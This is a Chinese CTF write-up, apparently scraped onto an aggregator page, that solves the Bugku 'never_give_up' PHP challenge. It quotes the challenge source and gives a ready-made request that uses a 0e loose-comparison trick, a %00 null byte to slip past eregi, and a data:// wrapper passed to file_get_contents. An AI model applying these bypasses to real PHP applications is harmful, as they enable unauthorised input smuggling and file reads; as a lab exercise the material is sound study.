当前位置: 首页 > wzjs >正文

微网站外链建设股份有限公司

wzjs 2025/9/4 6:41:44
微网站外链,建设股份有限公司,wordpress数据库改域名,嘉兴模板建站系统一个很有意思的题: never_give_up - Bugku CTF平台 注意到注释里面有1p.html,我们直接在源代码界面看,这样就不会跳转到它那个链接的: 然后解码可得: ";if(!$_GET[id]) {header(Location: hello.php?id1);exi…

一个很有意思的题:
never_give_up - Bugku CTF平台

注意到注释里面有1p.html,我们直接在源代码界面看,这样就不会跳转到它那个链接的:

然后解码可得:

";if(!$_GET['id'])
{header('Location: hello.php?id=1');exit();
}$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];
if(stripos($a,'.'))
{echo 'no no no no no no no';return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{$flag = "flag{***********}"
}
else
{print "never never never give up !!!";
}?>

实际上就是这三个条件,

  1. id=0e123即可,php读入直接会是0
  2. b这里要求长度大于5,第一个不能是4,但是又要和1114匹配,这里直接用字符就可以绕过b=%0011111
  3. a这里要使用file_get_contents的漏洞,可以使用php://input和data://text/plain,但是我的bp版本高好像php://input没用了,所以这里用后者代替把字符串输进去

GET /hello.php?id=0e123456&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111 HTTP/1.1

在burp加上这么一句即可:

http://www.dtcms.com/wzjs/602963.html

相关文章:

  • 怎样申请个人网站天津seo优化公司
  • wordpress多色主题天津外贸seo推广
  • 一站式做网站系统蒙牛企业网站建设规划书
  • 惠阳住房与规划建设局网站百度竞价排名是什么意思
  • wordpress安装语言设置中文乱码谷歌seo网站建设
  • 长治网站制作教程游戏网站建设的策划方案
  • 漳州模板网站建设秦皇岛酒店网站设计
  • 体育直播网站制作开发购物网站功能模块图
  • 伍佰亿网站备案收费网站设计制作哪家服务好
  • thinkphp手机网站模板wordpress标签链接分类目录
  • 手机网站吧乐亭中关村建站快车
  • 给wordpress语音朗读seo推广方式
  • 网站的设计与开发的图片纺织厂网站模板
  • 翻译建设网站舞台快速搭建
  • 商业网站建设所用软件福州作公司网站的公司
  • 网站改版301设置四平做网站佳业首页
  • 石家庄制作公司网站什么网站广告最多
  • 杭州企业网站定制广州app外包
  • 香河做网站shijuewang上海外贸公司注册流程及条件
  • 免费建站模板网站网站建设架构细节
  • 相馆网站建设费用预算asp.net mvc 网站开发之美
  • 国际学校网站如何建设怎么建网站站点
  • 网站运营和seo的区别网站建设分几种编程语言
  • 哪个网站做app最新国际热点新闻事件
  • 专门做酒店的网站沈阳无痛人流大概多少费用
  • 免费查公司信息的网站拖拽式网站
  • adsl做网站怎样快速安装wordpress
  • 网站建设费包括led灯具网站模板
  • 广州做网站信科建设全网络品牌推广
  • 百度站长平台官网网站建设实施方案ppt